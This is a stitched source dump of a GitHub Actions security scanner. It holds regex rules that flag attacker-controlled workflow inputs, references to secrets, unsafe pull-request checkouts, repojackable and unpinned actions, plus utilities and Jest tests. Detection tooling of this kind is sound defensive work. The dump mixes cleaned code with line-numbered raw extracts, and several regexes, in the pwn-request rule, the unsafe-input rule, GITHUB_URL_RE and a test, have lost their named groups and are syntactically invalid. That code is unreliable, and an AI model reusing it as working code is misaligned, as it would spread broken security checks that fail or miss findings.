// NOTE: this CAN be converted to a single huge unmaintainable regex. Leaving like this for readability.
// Expressions whose value may be attacker controlled when interpolated
// into a workflow/action.
export const UNTRUSTED_INPUT = [
  // Workflows.
  /github\.event\.issue\.title/,
  /github\.event\.issue\.body/,
  /github\.event\.pull_request\.title/,
  /github\.event\.pull_request\.body/,
  /github\.event\.comment\.body/,
  /github\.event\.review\.body/,
  /github\.event\.pages\.[\w.-]*\.page_name/,
  /github\.event\.commits\.[\w.-]*\.message/,
  /github\.event\.head_commit\.message/,
  /github\.event\.head_commit\.author\.email/,
  /github\.event\.head_commit\.author\.name/,
  /github\.event\.commits\.[\w.-]*\.author\.email/,
  /github\.event\.commits\.[\w.-]*\.author\.name/,
  /github\.event\.pull_request\.head\.ref/,
  /github\.event\.pull_request\.head\.label/,
  /github\.event\.pull_request\.head\.repo\.default_branch/,
  /github\.event\.workflow_run\.head_branch/,
  /github\.event\.workflow_run\.head_commit\.message/,
  /github\.event\.workflow_run\.head_commit\.author\.email/,
  /github\.event\.workflow_run\.head_commit\.author\.name/,
  /github\.head_ref/,
  // Actions.
  /inputs\.[\w.-]*/,
];

// Actions known to download workflow artifacts.
export const ARTIFACT_DOWNLOAD_ACTIONS = [
  'actions/download-artifact',
  'dawidd6/action-download-artifact',
  'aochmann/actions-download-artifact',
  'levonet/action-download-last-artifact',
  'ishworkh/docker-image-artifact-download',
  'ishworkh/container-image-artifact-download',
  'marcofaggian/action-download-multiple-artifacts',
];

// github-script/API methods that download artifacts.
export const ARTIFACT_DOWNLOAD_API = [
  'downloadArtifact',
  'getArtifact',
];

// Actions known to upload workflow artifacts.
export const ARTIFACT_UPLOAD_ACTIONS = [
  'actions/upload-artifact',
  'ishworkh/docker-image-artifact-upload',
  'ishworkh/container-image-artifact-upload',
]

// Steps that can be compromised by attacker-controlled files in the working
// directory (e.g. after an unsafe checkout). The `line` named group is read
// by pwn_request via evaluateStepRule(..., { run: "line" }). (Group names
// restored: the extracted source had invalid `(?...)` groups.)
export const CWD_COMPROMISABLE_RULES = [
  { uses: new RegExp("nick-invision/retry"), with: { command: new RegExp("^make\\s") } },

  { run: new RegExp("(?<line>npm i(nstall)?.*)$", "m") },
  { run: new RegExp("(?<line>make\\s.*)$", "m") },
  { run: new RegExp("(?<line>poetry install.*)$", "m") },
  { run: new RegExp("(?<line>poetry run.*)$", "m") },

  { run: new RegExp("[&|;]\\s*(?<line>[.]/.*)$", "m") },
]

// Steps that reference repository secrets in `with:` or `env:`.
// NOTE(review): the capture-group name was lost in extraction and is
// restored here as `secret` — confirm against the consumer of these rules.
export const SECRET_RULES = [
  { with: { "*": new RegExp("\\${{\\s+(?<secret>secrets[.].*?)\\s}}") } },
  { env: { "*": new RegExp("\\${{\\s+(?<secret>secrets[.].*?)\\s}}") } },
]
import { actionSteps } from "../../utils.mjs";

/**
 * Returns true when a workflow's `on:` directive contains `value`.
 * Handles the three YAML shapes GitHub accepts:
 *   on: push                    (string)
 *   on: [push, pull_request]    (sequence)
 *   on: { push: { ... } }       (mapping)
 *
 * Fixes vs. original: `typeof` never returns 'array' (that case was dead),
 * so sequence-style `on:` directives fell through to the object branch,
 * where Object.keys() yields numeric indices and the lookup always failed.
 * Also `errMSg` was never declared (ReferenceError in strict ESM) and a
 * bare string was thrown instead of an Error.
 */
export function onDirectiveContains(yamlContent, value) {
  const on = yamlContent?.on;
  if (on === undefined || on === null) return false;
  if (typeof on === 'string' || Array.isArray(on)) {
    return on.includes(value);
  }
  if (typeof on === 'object') {
    return Object.keys(on).includes(value);
  }
  const errMsg = `Unsupported yaml on: type ${typeof on}`;
  console.error(errMsg);
  throw new Error(errMsg);
}

/**
 * Collects every `run:` directive in the document as
 * [jobKey, job, step, stepid, run] tuples.
 */
export function extractRunDirectives(yamlContent) {
  const runDirectives = [];

  for (const [jobKey, job, step, stepid] of actionSteps(yamlContent)) {
    if (step.run) runDirectives.push([jobKey, job, step, stepid, step.run])
  }

  return runDirectives;
}
RegExp("(?refs/pull/.*/merge)"), 32 | } 33 | } 34 | ]; 35 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 36 | await Promise.all(stepMatches(PWN_REQUEST_RULES, step).map(async rule => { 37 | const { with: { ref } } = evaluateStepRule(rule, step, { with: { ref: "ref" } }); 38 | const stepid = step.name || stepidx; 39 | 40 | let potentially_compromisable_steps = []; 41 | const [stepoffset, subsequentsteps] = await action.stepsAfter(jobKey, stepid); 42 | for (const [subsequentstepidx, subsequentstep] of subsequentsteps.entries()) { 43 | const matches = stepMatches(CWD_COMPROMISABLE_RULES, subsequentstep); 44 | if (matches.length > 0) { 45 | potentially_compromisable_steps.push({ 46 | "step": subsequentstep.name || stepoffset + subsequentstepidx, 47 | "why": matches.map(rule => evaluateStepRule(rule, subsequentstep, { run: "line" })) 48 | }) 49 | } 50 | 51 | const localuses = stepMatches([{ uses: new RegExp("^./") }], subsequentstep); 52 | if (localuses.length > 0) { 53 | potentially_compromisable_steps.push({ 54 | "step": subsequentstep.name || stepoffset + subsequentstepidx, 55 | "why": `uses: ${subsequentstep.uses}` 56 | }) 57 | } 58 | } 59 | 60 | findings.push(new Finding( 61 | PwnRequest, 62 | action, 63 | jobKey, 64 | stepid, 65 | { 66 | ref, 67 | potentially_compromisable_steps 68 | } 69 | )) 70 | 71 | })) 72 | } 73 | 74 | 75 | return findings; 76 | 77 | } 78 | 79 | } 80 | 81 | export { PwnRequest as default } 82 | -------------------------------------------------------------------------------- /lib/rules/repojackable.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | import { get } from "https"; 3 | 4 | function get_statuscode(url) { 5 | return new Promise((resolve) => 6 | get(url, res => resolve(res.statusCode)) 7 | ) 8 | } 9 | 10 | class Repojackable { 11 | static id = "REPOJACKABLE" 12 | static documentation = 
"https://github.com/snyk/github-actions-scanner#REPOJACKABLE" 13 | 14 | static async description(finding) { 15 | return `The identified used action may be repojackable due to ${finding.details.reason}` 16 | } 17 | 18 | static async scan(_action) { 19 | const findings = []; 20 | let org; 21 | let repo; 22 | if (_action.repo === undefined) { 23 | org = _action.norepo?.org; 24 | repo = _action.norepo?.action; 25 | } else { 26 | org = _action.repo.owner; 27 | repo = _action.repo.repo; 28 | } 29 | const repostatus = await get_statuscode(`https://github.com/${org}/${repo}`); 30 | if (repostatus >= 300 && repostatus < 400) { 31 | findings.push(new Finding( 32 | Repojackable, 33 | _action, 34 | undefined, 35 | undefined, 36 | { 37 | "reason": "repository redirect" 38 | } 39 | )) 40 | } else { 41 | const orgstatus = await get_statuscode(`https://github.com/${org}`); 42 | if (orgstatus == 404) { 43 | findings.push(new Finding( 44 | Repojackable, 45 | _action, 46 | undefined, 47 | undefined, 48 | { 49 | "reason": "organisation not found" 50 | } 51 | )) 52 | 53 | } 54 | } 55 | 56 | return findings; 57 | } 58 | } 59 | 60 | export { Repojackable as default } 61 | -------------------------------------------------------------------------------- /lib/rules/test_rule.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | 3 | class TestRule { 4 | static id = "TEST_RULE" 5 | static documentation = "https://github.com/snyk/github-actions-scanner#TEST_RULE" 6 | 7 | static async description(finding) { 8 | return `This is a test rule` 9 | } 10 | 11 | static async scan(action) { 12 | const yamlContent = await action.parsedContent(); 13 | const findings = []; 14 | if (yamlContent?.on?.TEST) { 15 | findings.push(new Finding( 16 | TestRule, 17 | action, 18 | undefined, 19 | undefined 20 | )) 21 | } 22 | 23 | return findings; 24 | } 25 | } 26 | 27 | export { TestRule as default } 28 | 
-------------------------------------------------------------------------------- /lib/rules/unpinned_action.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | import { ACTION_NAME_REGEX } from '../utils.mjs'; 3 | 4 | const COMMIT_REGEX = new RegExp("[a-z0-9]{32}") 5 | 6 | class UnpinnedAction { 7 | static id = "UNPINNED_ACTION" 8 | static documentation = "https://github.com/snyk/github-actions-scanner#UNPINNED_ACTION" 9 | 10 | static async description(finding) { 11 | return `The action ${finding.details.uses} is used with branch/tag ${finding.details.ref} rather than a pinned commit.` 12 | } 13 | 14 | static async scan(action) { 15 | const findings = []; 16 | 17 | for (const [step, usedby] of await action.getAllUses()) { 18 | if (step.uses.startsWith(".")) continue; // repo-local action 19 | let { groups: { ref } } = step.uses.match(ACTION_NAME_REGEX) 20 | if (!ref.match(COMMIT_REGEX)) { 21 | findings.push(new Finding( 22 | UnpinnedAction, 23 | action, 24 | usedby.job, 25 | usedby.step, 26 | { 27 | uses: step.uses, 28 | ref 29 | } 30 | )) 31 | } 32 | } 33 | 34 | return findings; 35 | } 36 | } 37 | 38 | export { UnpinnedAction as default } 39 | -------------------------------------------------------------------------------- /lib/rules/unsafe_input_assign.mjs: -------------------------------------------------------------------------------- 1 | import { stepMatches, evaluateStepRule, actionSteps } from "../utils.mjs"; 2 | import { UNTRUSTED_INPUT } from "./common/defs.mjs"; 3 | import { Finding } from "./common/finding.mjs"; 4 | 5 | const UNTRUSTED_INPUT_RULES = UNTRUSTED_INPUT.map(input => { 6 | return { 7 | with: { "*": new RegExp(`[$]{{[^}]*?(?${input.source})[^}]*}}`, "m") } 8 | } 9 | }) 10 | 11 | class UnsafeInputAssign { 12 | static id = "UNSAFE_INPUT_ASSIGN" 13 | static documentation = "https://github.com/snyk/github-actions-scanner#UNSAFE_INPUT_ASSIGN" 14 | 15 | static 
async description(finding) { 16 | return `The identified step passes the potentially attacker controlled value ${finding.details.value}. This may result in undesirable behaviour` 17 | } 18 | 19 | static async scan(action) { 20 | let findings = []; 21 | for (const [jobKey, job, step, stepidx] of actionSteps(await action.parsedContent())) { 22 | stepMatches(UNTRUSTED_INPUT_RULES, step).forEach( 23 | rule => findings.push(new Finding( 24 | UnsafeInputAssign, 25 | action, 26 | jobKey, 27 | step.name || stepidx, 28 | { 29 | "with_item": evaluateStepRule(rule, step).with, 30 | "value": Object.values(evaluateStepRule(rule, step, { with: { "*": "src" } }).with) 31 | } 32 | )) 33 | ) 34 | } 35 | return findings; 36 | } 37 | } 38 | 39 | export { UnsafeInputAssign as default } 40 | -------------------------------------------------------------------------------- /lib/rules/workflow_run.mjs: -------------------------------------------------------------------------------- 1 | import { onDirectiveContains } from "./common/utils.mjs"; 2 | import { actionSteps } from "../utils.mjs"; 3 | import { Finding } from "./common/finding.mjs"; 4 | 5 | class WorkflowRun { 6 | static id = "WORKFLOW_RUN" 7 | static documentation = "https://github.com/snyk/github-actions-scanner#WORKFLOW_RUN" 8 | 9 | static async scan(action) { 10 | const yamlContent = await action.parsedContent(); 11 | let findings = []; 12 | if (!onDirectiveContains(yamlContent, 'workflow_run')) { 13 | return findings; 14 | } 15 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 16 | if ( 17 | step.uses?.includes("actions/checkout") && 18 | step.with?.ref?.includes("github.event.workflow_run") 19 | ) { 20 | findings.push(new Finding( 21 | WorkflowRun, 22 | action, 23 | jobKey, 24 | step.name || stepidx, 25 | { 26 | 'on': yamlContent.on, 27 | 'if': job?.if ? 
// -------------------------------------------------------------
// lib/scanner.mjs
import fs from 'fs';
import path from 'path';
import { fileURLToPath } from 'url';
import { logger } from "./utils.mjs";

/** Loads the rule modules in ./rules and runs them against actions. */
export class Scanner {
  /** Async factory (rule loading is async) — use instead of `new Scanner()`. */
  static async new(options) {
    const s = new Scanner();
    await s.loadRules(options.scanRules);
    s.scanned = 0;
    return s;
  }

  /**
   * Imports every .mjs rule module and filters by `scanRules`:
   * undefined enables everything; a list of ids enables only those rules;
   * a list where every entry is "!"-prefixed disables those rules.
   */
  async loadRules(scanRules) {
    const __dirname = path.dirname(fileURLToPath(import.meta.url));
    const rulesDir = path.join(__dirname, 'rules');
    const ruleFiles = fs.readdirSync(rulesDir).filter(file => file.endsWith('.mjs'));

    const rules = await Promise.all(
      ruleFiles.map(file =>
        import(`./rules/${file}`)
      )
    );

    // Negation mode only when *every* entry is "!"-prefixed.
    const scanRulesNegate = scanRules ? scanRules.every(rule => rule.startsWith("!")) : false;

    this.rules = rules
      .map(ruleModule => ruleModule.default)
      .filter(rule => rule) // modules without a default export are not rules
      .filter(rule => {
        if (!scanRules) return true;
        if (scanRulesNegate) {
          return !scanRules.includes("!" + rule.id)
        } else {
          return scanRules.includes(rule.id);
        }
      }
      );
    logger.debug(`The following rules are enabled: ${this.rules.map(rule => rule.id).join(",")}`)
  }

  /**
   * Runs every enabled rule against `action`; a rule that throws is logged
   * and skipped so one bad rule cannot abort the whole scan.
   */
  async scanAction(action) {
    this.scanned += 1;
    let findings = [];
    for (let rule of this.rules) {
      try {
        const rulefindings = await rule.scan(action)
        findings.push(...rulefindings);
      } catch (e) {
        // Use the stable rule.id and optional-chain repo fields: actions
        // without a resolved repo would otherwise crash this very handler.
        logger.warn(`Failed to scan with ${rule.id} for ${action.repo?.owner}/${action.repo?.repo}/${action.subpath}@${action.repo?.ref}: ${e.message}`)
      }
    }
    return findings;
  }
}
expect(A3.subpath).toBe("action.yml") 36 | }) 37 | 38 | test("Validate Action findOrCreate", async () => { 39 | const R = await Repo.fromUrl("https://github.com/snyk/cli") 40 | 41 | { 42 | const A = await Action.fromUses(R, "actions/checkout@v4") 43 | expect(A.repo.owner).toBe("actions") 44 | expect(A.repo.repo).toBe("checkout") 45 | expect(A.repo.ref).toBe("v4") 46 | } 47 | 48 | const R2 = await Repo.fromUrl("https://github.com/actions/checkout/commit/v4") 49 | { 50 | const A = await Action.fromUses(R, "actions/checkout@v4") 51 | expect(A.repo).toEqual(R2) 52 | } 53 | }) 54 | 55 | test("Validate Action.fromUrl", async () => { 56 | const A = await Action.fromUrl("https://github.com/snyk/cli") 57 | expect(A.repo.owner).toBe("snyk") 58 | expect(A.repo.repo).toBe("cli") 59 | expect(A.repo.ref).toBe("main") 60 | expect(A.subpath).toBe("action.yml") 61 | }); 62 | -------------------------------------------------------------------------------- /lib/test/clone.test.js: -------------------------------------------------------------------------------- 1 | import { Git } from '../clone.mjs'; 2 | import { statSync } from 'fs'; 3 | 4 | test("Ensure Git tidies up", () => { 5 | const G = new Git(); 6 | 7 | let stat = statSync(G.directory, { 8 | throwIfNoEntry: false 9 | }); 10 | expect(stat).not.toBe(undefined); 11 | expect(stat.isDirectory()).toBe(true); 12 | 13 | G.cleanup(); 14 | stat = statSync(G.directory, { 15 | throwIfNoEntry: false 16 | }); 17 | expect(stat).toBe(undefined); 18 | }) 19 | 20 | test("Ensure Git can successfully clone", () => { 21 | const G = new Git(); 22 | 23 | let stat = statSync(`${G.directory}/README.md`, { 24 | throwIfNoEntry: false 25 | }); 26 | expect(stat).toBe(undefined); 27 | 28 | G.clone("https://github.com/snyk/cli") 29 | 30 | stat = statSync(`${G.directory}/README.md`, { 31 | throwIfNoEntry: false 32 | }); 33 | expect(stat).not.toBe(undefined); 34 | expect(stat.isFile()).toBe(true); 35 | 36 | G.cleanup(); 37 | }) 38 | 
-------------------------------------------------------------------------------- /lib/test/rules_common_utils.test.js: -------------------------------------------------------------------------------- 1 | import { stepMatches, evaluateStepRule } from "../utils.mjs"; 2 | 3 | test("Test recursive rule match", () => { 4 | const RULES = [ 5 | { uses: new RegExp("nick-invision/retry"), with: { command: new RegExp("make") } } 6 | ] 7 | 8 | const step = { 9 | name: 'Run PAT E2E', 10 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 11 | env: { GITHUB_AUTH_TOKEN: '${{ secrets.GH_AUTH_TOKEN }}' }, 12 | with: { 13 | max_attempts: 3, 14 | retry_on: 'error', 15 | timeout_minutes: 30, 16 | command: 'make e2e-pat' 17 | } 18 | } 19 | 20 | const matches = stepMatches(RULES, step); 21 | 22 | expect(matches.length).toBe(1); 23 | }) 24 | 25 | test("Test recursive rule match with wildcard", () => { 26 | const RULES = [ 27 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } } 28 | ] 29 | 30 | const step = { 31 | name: 'Run GITHUB_TOKEN E2E', 32 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 33 | env: { 34 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 35 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 36 | }, 37 | with: { 38 | max_attempts: 3, 39 | retry_on: 'error', 40 | timeout_minutes: 30, 41 | command: 'make e2e-gh-token' 42 | } 43 | } 44 | 45 | const matches = stepMatches(RULES, step); 46 | 47 | expect(matches.length).toBe(1); 48 | }) 49 | 50 | test("Test recursive rule match with two rules", () => { 51 | const RULES = [ 52 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } }, 53 | { with: { DOESNTMATCH: true } } 54 | ] 55 | 56 | const step = { 57 | name: 'Run GITHUB_TOKEN E2E', 58 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 59 | env: { 60 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 61 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 62 | }, 63 | with: { 64 | max_attempts: 3, 65 | 
retry_on: 'error', 66 | timeout_minutes: 30, 67 | command: 'make e2e-gh-token' 68 | } 69 | } 70 | 71 | const matches = stepMatches(RULES, step); 72 | 73 | expect(matches.length).toBe(1); 74 | }) 75 | 76 | test("Test recursive rule match with nonmatching rule", () => { 77 | const RULES = [ 78 | { with: { DOESNTMATCH: true } } 79 | ] 80 | 81 | const step = { 82 | name: 'Run GITHUB_TOKEN E2E', 83 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 84 | env: { 85 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 86 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 87 | }, 88 | with: { 89 | max_attempts: 3, 90 | retry_on: 'error', 91 | timeout_minutes: 30, 92 | command: 'make e2e-gh-token' 93 | } 94 | } 95 | 96 | const matches = stepMatches(RULES, step); 97 | 98 | expect(matches.length).toBe(0); 99 | }) 100 | 101 | test("Test recursive rule match with close but nonmatching rule", () => { 102 | const RULES = [ 103 | { env: { "DOESNTMATCH": new RegExp("\\${{\\s*secrets[.]") } }, 104 | ] 105 | 106 | const step = { 107 | name: 'Run GITHUB_TOKEN E2E', 108 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 109 | env: { 110 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 111 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 112 | }, 113 | with: { 114 | max_attempts: 3, 115 | retry_on: 'error', 116 | timeout_minutes: 30, 117 | command: 'make e2e-gh-token' 118 | } 119 | } 120 | 121 | const matches = stepMatches(RULES, step); 122 | 123 | expect(matches.length).toBe(0); 124 | }) 125 | 126 | test("Test recursive rule match with not present key", () => { 127 | const RULES = [ 128 | { env: { "DOESNTMATCH": undefined } }, 129 | ] 130 | 131 | const step = { 132 | name: 'Run GITHUB_TOKEN E2E', 133 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 134 | env: { 135 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 136 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 137 | }, 138 | with: { 139 | max_attempts: 3, 140 
| retry_on: 'error', 141 | timeout_minutes: 30, 142 | command: 'make e2e-gh-token' 143 | } 144 | } 145 | 146 | const matches = stepMatches(RULES, step); 147 | 148 | expect(matches.length).toBe(1); 149 | }) 150 | 151 | test("Test recursive rule negative match with not present key", () => { 152 | const RULES = [ 153 | { env: { "DOESNTMATCH": undefined } }, 154 | ] 155 | 156 | const step = { 157 | name: 'Run GITHUB_TOKEN E2E', 158 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 159 | env: { 160 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 161 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}', 162 | DOESNTMATCH: "true" 163 | }, 164 | with: { 165 | max_attempts: 3, 166 | retry_on: 'error', 167 | timeout_minutes: 30, 168 | command: 'make e2e-gh-token' 169 | } 170 | } 171 | 172 | const matches = stepMatches(RULES, step); 173 | 174 | expect(matches.length).toBe(0); 175 | }) 176 | 177 | test("Test rule evalator", () => { 178 | const RULE = { env: { "*": "FINDME" } }; 179 | 180 | const step = { 181 | foo: "bar", 182 | env: { 183 | "abc": "FINDME", 184 | "def": "notme", 185 | "ghi": "FINDME" 186 | } 187 | } 188 | 189 | const evaluated = evaluateStepRule(RULE, step) 190 | 191 | expect(evaluated).toEqual({ 192 | "env": { 193 | "abc": "FINDME", 194 | "ghi": "FINDME", 195 | } 196 | }) 197 | }) 198 | 199 | test("Test rule evalator with regex", () => { 200 | const RULE = { env: { "*": new RegExp(".INDME") } }; 201 | 202 | const step = { 203 | foo: "bar", 204 | env: { 205 | "abc": "FINDME", 206 | "def": "notme", 207 | "ghi": "FINDME" 208 | } 209 | } 210 | 211 | const evaluated = evaluateStepRule(RULE, step) 212 | 213 | expect(evaluated).toEqual({ 214 | "env": { 215 | "abc": "FINDME", 216 | "ghi": "FINDME", 217 | } 218 | }) 219 | }) 220 | 221 | test("Test rule evalator with regex groups", () => { 222 | const RULE = { env: { "*": new RegExp("FINDME(?...)") } }; 223 | 224 | const step = { 225 | foo: "bar", 226 | env: { 227 | "abc": "FINDMEabc", 228 | 
"def": "notme", 229 | "ghi": "FINDMEdef" 230 | } 231 | } 232 | 233 | const evaluated = evaluateStepRule(RULE, step, { env: { "*": "suffix" } }) 234 | 235 | expect(evaluated).toEqual({ 236 | "env": { 237 | "abc": "abc", 238 | "ghi": "def", 239 | } 240 | }) 241 | }) 242 | -------------------------------------------------------------------------------- /lib/test/utils.test.js: -------------------------------------------------------------------------------- 1 | import { GITHUB_URL_RE } from '../utils.mjs'; 2 | 3 | test("Validate GITHUB_URL_RE", () => { 4 | const url = "https://github.com/snyk/github-actions-scanner"; 5 | const matched = url.match(GITHUB_URL_RE); 6 | 7 | expect(matched).not.toBe(undefined); 8 | expect(matched).not.toBe(null); 9 | 10 | expect(matched.groups?.owner).toBe("snyk"); 11 | expect(matched.groups?.repo).toBe("github-actions-scanner"); 12 | }) 13 | 14 | test("Validate GITHUB_URL_RE with ref", () => { 15 | const url = "https://github.com/snyk/github-actions-scanner/commit/da9d1b0a1dc97dc89cd12569a01636c21900a102"; 16 | const matched = url.match(GITHUB_URL_RE); 17 | 18 | expect(matched).not.toBe(undefined); 19 | expect(matched).not.toBe(null); 20 | 21 | expect(matched.groups?.owner).toBe("snyk"); 22 | expect(matched.groups?.repo).toBe("github-actions-scanner"); 23 | expect(matched.groups?.ref).toBe("da9d1b0a1dc97dc89cd12569a01636c21900a102"); 24 | }) 25 | -------------------------------------------------------------------------------- /lib/utils.mjs: -------------------------------------------------------------------------------- 1 | import { clearTimeout, setTimeout } from 'node:timers'; 2 | import { get } from 'node:https'; 3 | import { extract } from 'tar-stream'; 4 | import gunzip from 'gunzip-maybe'; 5 | import { inspect } from 'util'; 6 | import chalk from 'chalk'; 7 | import winston from 'winston'; 8 | 9 | export const GITHUB_URL_RE = new RegExp("https://github.com/(?[^/]+)/(?[^/]+)(/commit/(?[0-9a-z-.]+))?") 10 | export const 
ACTION_NAME_REGEX = new RegExp("^(?<owner>[^/]*)/(?<repo>[^@/]*)(/(?<path>[^@]*))?(@(?<ref>.*))?")
// NOTE(review): capture-group names were lost in extraction. `ref` is
// grounded (unpinned_action destructures `groups: { ref }`); `owner`,
// `repo` and `path` are best-guess — confirm against lib/actions.mjs.

// Glob/regex forms of the workflow & action file locations GitHub honours.
const GITHUB_ACTIONS_FILE_MATCH = ['**/action.(yml|yaml)', '.github/actions/**/action.(yml|yaml)', '.github/workflows/*.(yml|yaml)']
const GITHUB_ACTIONS_FILE_REGEX = new RegExp(`^(.github/(actions/.*/action[.]ya?ml|workflows/.*[.]ya?ml)|(.*/)?action[.]ya?ml)$`)

const loggerformat = winston.format.printf(({ level, message, label, timestamp }) => {
  return `${timestamp} ${level}: ${message}`;
});
export const logger = winston.createLogger({
  level: process.env.LOG_LEVEL || 'info',
  format: winston.format.combine(
    winston.format.timestamp(),
    winston.format.colorize(),
    loggerformat
  ),
  transports: [
    new winston.transports.Console(),
  ]
});

/**
 * Downloads a .tar.gz archive and extracts the content of every GitHub
 * Actions file (workflow or action.yml) it contains.
 *
 * @param {string} tgzUrl   URL of the gzipped tarball.
 * @param {number} maxSize  Abort the download past this many bytes (default 5 MiB).
 * @returns {Promise<Object<string,string>>} map of repo-relative path -> file content.
 */
export async function getFilesFromArchive(tgzUrl, maxSize = 5 * 1024 * 1024) {
  // Watchdog: warn if extraction is still running after 30s. (Fixed: the
  // original referenced an undeclared `filesToExtract`, so the watchdog
  // itself threw ReferenceError whenever it fired.)
  const timer = setTimeout(() => {
    logger.warn(chalk.grey('getFilesFromArchive STUCK', tgzUrl));
  }, 30000);
  timer.unref();

  let chunksSize = 0;
  const result = {
    filesExtracted: {},
    files: [],
    finished: false,
  };

  return new Promise((resolve, reject) => {
    const streamExtractor = extract();

    streamExtractor.on('entry', (header, stream, next) => {
      if (header.type === 'file') {
        // Strip the archive's top-level directory (e.g. "repo-<sha>/").
        const relname = header.name.slice(header.name.indexOf("/") + 1)
        if (relname.match(GITHUB_ACTIONS_FILE_REGEX)) {
          result.filesExtracted[relname] = ""
          stream.on('data', (chunk) => {
            result.filesExtracted[relname] += chunk.toString();
          });
        }
      }

      stream.on('end', () => {
        next();
      });

      stream.resume(); // always drain, even for skipped entries
    });

    const request = get(tgzUrl, (response) => {
      if (response.statusCode !== 200) {
        return reject(new Error(`Non 200 response: ${response.statusCode}`));
      }

      response.on('data', (chunk) => {
        chunksSize += chunk.length;

        // Over budget: stop downloading but keep what was extracted so far.
        if (chunksSize >= maxSize) {
          response.destroy();
          request.destroy();
        }
      });

      response.on('end', () => {
        result.finished = true;
      });

      response.pipe(gunzip()).pipe(streamExtractor);
    });

    let error = null;

    request.on('error', (e) => {
      error = e;
    });

    streamExtractor.on('error', (e) => {
      error = e;
    });

    request.on('close', () => {
      if (result.finished) {
        // Full download: wait for the extractor to flush before settling.
        streamExtractor.on('finish', () => {
          error ? reject(error) : resolve(result.filesExtracted);
          clearTimeout(timer);
        });
      } else {
        // Truncated download: settle with whatever was extracted.
        error ? reject(error) : resolve(result.filesExtracted);
        clearTimeout(timer);
      }
    });
  });
}

/** Pretty-prints any value with full depth and colors. */
export function prettyPrint(data) {
  console.log(inspect(data, { colors: true, depth: null }));
}

/**
 * Yields [jobKey, job, step, stepidx] for every step of a workflow
 * (`jobs:`) or composite action (`runs:`).
 */
export function* actionSteps(yamlContent) {
  if (yamlContent?.jobs) {
    for (const jobKey of Object.keys(yamlContent.jobs)) {
      const job = yamlContent.jobs[jobKey];
      if (job.hasOwnProperty('steps') && Array.isArray(job.steps)) {
        for (const [stepidx, step] of job.steps.entries()) {
          if (step) yield [jobKey, job, step, stepidx]
        }
      }
    }
  }

  if (yamlContent?.runs) {
    if (Array.isArray(yamlContent.runs?.steps)) {
      const steps = yamlContent.runs.steps
      for (const [stepidx, step] of steps.entries()) {
        // Yield the composite `runs` object in the job slot, mirroring the
        // jobs branch. (The original yielded `step` twice, so consumers saw
        // each step as its own enclosing job.)
        if (step) yield [yamlContent.name, yamlContent.runs, step, stepidx]
      }
    }
  }
}
false : true; 139 | } else if (rule instanceof Object) { 140 | let result = []; 141 | for (const [key, value] of Object.entries(rule)) { 142 | if (key == "*") { 143 | result.push(Object.values(input).some( 144 | inputvalue => recursiveMatcher(value, inputvalue) 145 | )) 146 | } else if (input.hasOwnProperty(key)) { 147 | result.push(recursiveMatcher(value, input[key])); 148 | } else if (value === undefined && !input.hasOwnProperty(key)) { 149 | result.push(true) 150 | } else { 151 | result.push(false) 152 | } 153 | } 154 | return result.every(bool => bool) 155 | } else { 156 | return rule === input 157 | } 158 | } 159 | 160 | export function stepMatches(rules, step) { 161 | return rules.filter( 162 | rule => recursiveMatcher(rule, step) 163 | ) 164 | } 165 | 166 | function recursiveEvaluate(rule, step, regexpgroup) { 167 | if (rule instanceof RegExp) { 168 | if (regexpgroup === undefined) return step; 169 | rule.lastIndex = 0; 170 | let output = []; 171 | let match; 172 | 173 | // many matches or just one? 
174 | if (rule.flags.includes("g")) { 175 | while (match = rule.exec(step)) { 176 | output.push(match.groups?.[regexpgroup] || match[0]) 177 | } 178 | return output; 179 | } else { 180 | match = rule.exec(step); 181 | return match.groups?.[regexpgroup] || match[0] 182 | } 183 | 184 | } else if (rule instanceof Object) { 185 | let result = {}; 186 | for (const [key, value] of Object.entries(rule)) { 187 | if (key === "*") { 188 | Object.entries(step).forEach(([k, v]) => { 189 | if (recursiveMatcher(value, v)) { 190 | result[k] = recursiveEvaluate(value, v, regexpgroup?.[k] || regexpgroup?.["*"]); 191 | } 192 | }) 193 | } else if (step.hasOwnProperty(key)) { 194 | result[key] = recursiveEvaluate(value, step[key], regexpgroup?.[key] || regexpgroup?.["*"]) 195 | } else { 196 | result[key] = value; 197 | } 198 | } 199 | return result; 200 | } else { 201 | // string or number or something 202 | return step; 203 | } 204 | } 205 | 206 | export function evaluateStepRule(rule, step, regexpgroup = false) { 207 | return recursiveEvaluate(rule, step, regexpgroup); 208 | } 209 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "github-actions-analyzer", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.mjs", 6 | "scripts": { 7 | "test": "node 